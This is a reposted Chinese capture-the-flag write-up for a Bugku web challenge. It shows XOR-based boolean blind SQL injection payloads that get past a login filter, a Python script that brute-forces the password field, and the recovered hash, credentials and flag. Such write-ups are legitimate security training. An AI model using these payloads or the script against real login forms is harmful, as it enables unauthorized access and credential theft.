
http://123.206.87.240:8007/web2/
全都tm过滤了绝望吗?
提示 !,!=,=,+,-,^,%

尝试进行SQL 注入,发现有过滤。

判断过滤关键字符串。

还是有很多关键字没有过滤的
SQL 注入测试
uname=admin

说明用户名正确。
uname=admin'^(length('ajest')!=5)^'

此处可以考虑使用异或注入。
uname=admin'^(uname!='admin')^'

判断passwd 字段内容长度
uname=admin'^(length(passwd)!=32)^'

因此能够确定,passwd 字段长度为32,此处可以考虑使用布尔盲注。
考虑到,该环境中过滤掉了关键字
for
空格
因此构造参数
uname=admin'^(ascii(substr((passwd)from(1)))!=48)^'

所以passwd
首字母ascii 值为48
。
此处可以编写python 脚本
import requests
url = "http://123.206.87.240:8007/web2/login.php"
passwd = ""
for i in range(1,33):
for j in range(32,128):
data = {"uname":"admin'^(ascii(substr((passwd)from("+str(i)+")))!="+str(j)+")^'",
"passwd":'admin'}
print(data)
res = requests.post(url=url,data=data)
if "password error!!@_@" in res.text:
passwd = passwd + chr(j)
break
print(passwd)
# 0192023a7bbd73250516f069df18b500
192023a7bbd73250516f069df18b500
admin123
使用帐密登录网站
admin:admin123

ls

flag{sql_iNJEct_comMon3600!}
最后
以上就是欢喜红牛最近收集整理的关于SQL 登录注入脚本_[CTF]BugkuCTF - Web - sql注入2的全部内容,更多相关SQL内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复